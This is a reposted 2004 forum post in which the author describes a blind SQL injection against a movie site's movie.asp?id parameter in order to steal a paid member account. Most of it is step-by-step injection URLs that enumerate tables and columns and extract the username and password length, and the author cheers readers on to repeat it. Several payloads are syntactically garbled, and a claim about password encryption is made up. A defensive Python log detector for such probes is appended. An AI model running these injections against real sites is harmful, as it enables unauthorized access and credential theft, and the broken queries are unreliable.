Successful SQL injection

zhaozj 2021-02-16

I wanted to watch movies today, but the several movie websites I found all charge. Pain, poor, helpless... I wanted to get a username and password to watch with, and I thought of SQL injection. I started with:

http://www.xxx.com/movie.asp?id=126 and 1 = 1

I tried it and it didn't report an error. Haha, there is hope.

Then I came back with

http://www.xxx.com/movie.asp?id=126 and (select count (*) from user)> = 0

which gave an error. That means there is no user table. Try again. After a few tries in between,

http://www.xxx.com/movie.asp?id=126 and (select count (*) from users)> = 0

was successful. This shows there is a users table in the database. Next come the user and password fields in the table.

http://www.xxx.com/movie.asp?id=126 and (select count (user)> = 0

gave an error. I tried N times in between. Finally

http://www.xxx.com/movie.asp?id=126 and (Select Count (userid) from users > = 0

was successful. Then again, having just got the username field, the password field was successful too:

http://www.xxx.com/movie.asp?id=126 and (Select Count (Password) from Users)> = 0

With this information, the next step is to guess the username. First get the length of the username.

http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (Userid) from users> 0 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (Userid)> 1 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (UserID) from users> 2 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (UserID) from users> 3 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 Len (userid)> 4 Success
http://www.xxx.com/movie.asp?id=126 and (select top 1 len (userid) from users> 5 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (userid) from users> 6 Error

The length of the username is determined from the above. Never mind whether the password is encrypted; get the username first. Then on we go.

http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 47 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 57 Failed

From this, the first character of the username is a number. The range of numbers is very easy.

http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 48 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 49 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 50 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 51 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 52 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 53 Success
http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 54 Error

So the first character is 6. Then, as above, I went on all the way to ASC ((User, 6, 1)) and guessed the username.

After all that, I finally got a username: 664306. This saved a lot of guessing steps. That was my luck.

With the username, next is the password. I feared the password was encrypted with MD5, so I didn't have much hope. I used Len to try it and see whether it is too long. Guessing the username was already a lot of progress for me. Passwords longer than 12 are encrypted, and then this method is of no use.

http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (Password) from users> 12 Error

The password is not longer than 12 characters, so it may not be encrypted. So I slowly reduced the number at the end, finally reaching:

http://www.xxx.com/movie.asp?id=126 and (Select Top 1 Len (Password) from users> 5 Success

Is it 6 characters? Are the username and password the same? Ha ha. I tried it. Sure enough, I got a gold member account.

The username and password being the same also saved me many steps.

If the username and password are different, just guess the password slowly with the same method used for the username. As long as the password is not encrypted, you will be able to get it. I wish my friends good luck.

This is my first test result after reading the tutorial here. I wrote it up as a post here to express my thanks.

I also ask everyone to give this younger brother plenty of pointers.

June 19, 2004 12:37
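
Seen from the server side, the stepped "> N" requests described in this post leave a recognisable trail in the web access log. The following is an added example, not part of the original post: a Python sketch that groups such requests by client and subquery and reports the value at which the response flipped from success to error. The log layout, the sample lines, and the assumption that the "error" response is logged with an HTTP status of 400 or above are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the post): date time client method path query status
SAMPLE_LOG = """\
2004-06-19 12:01:01 10.0.0.5 GET /movie.asp id=126 200
2004-06-19 12:01:09 10.0.0.5 GET /movie.asp id=126+and+1=1 200
2004-06-19 12:02:00 10.0.0.5 GET /movie.asp id=126+and+(select+top+1+len(userid)+from+users)>4 200
2004-06-19 12:02:05 10.0.0.5 GET /movie.asp id=126+and+(select+top+1+len(userid)+from+users)>5 200
2004-06-19 12:02:11 10.0.0.5 GET /movie.asp id=126+and+(select+top+1+len(userid)+from+users)>6 500
2004-06-19 12:03:00 10.0.0.9 GET /movie.asp id=127 200
"""

# A numeric parameter followed by "and (select ...) > N": the stepped probe shape in the post.
PROBE = re.compile(r"=\s*\d+\s+and\s*\(\s*(select\b.*?)\)?\s*>\s*(\d+)\s*$", re.I)

def find_enumeration(log_text, min_steps=3):
    """Group probes by (client, path, subquery); flag groups that step the threshold."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # not in the assumed seven-field layout
        _, _, client, _, path, query, status = parts
        m = PROBE.search(unquote_plus(query))
        if m:
            subquery = re.sub(r"\s+", " ", m.group(1).lower()).strip()
            groups[(client, path, subquery)].append((int(m.group(2)), int(status)))
    findings = []
    for (client, path, subquery), hits in groups.items():
        thresholds = sorted({t for t, _ in hits})
        if len(thresholds) < min_steps:
            continue
        ok = [t for t, s in hits if s < 400]
        err = [t for t, s in hits if s >= 400]
        # "> N" succeeded up to max(ok) and failed at min(err): the value disclosed is min(err).
        leaked = min(err) if ok and err and max(ok) + 1 == min(err) else None
        findings.append({"client": client, "path": path, "subquery": subquery,
                         "steps": thresholds, "leaked_value": leaked})
    return findings

if __name__ == "__main__":
    for finding in find_enumeration(SAMPLE_LOG):
        print(finding)
```

The `leaked_value` field tells a responder which values were disclosed through the success/error difference, which is what decides the credentials that need resetting.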

Please credit the original URL when reposting: https://www.9cbs.com/read-12815.html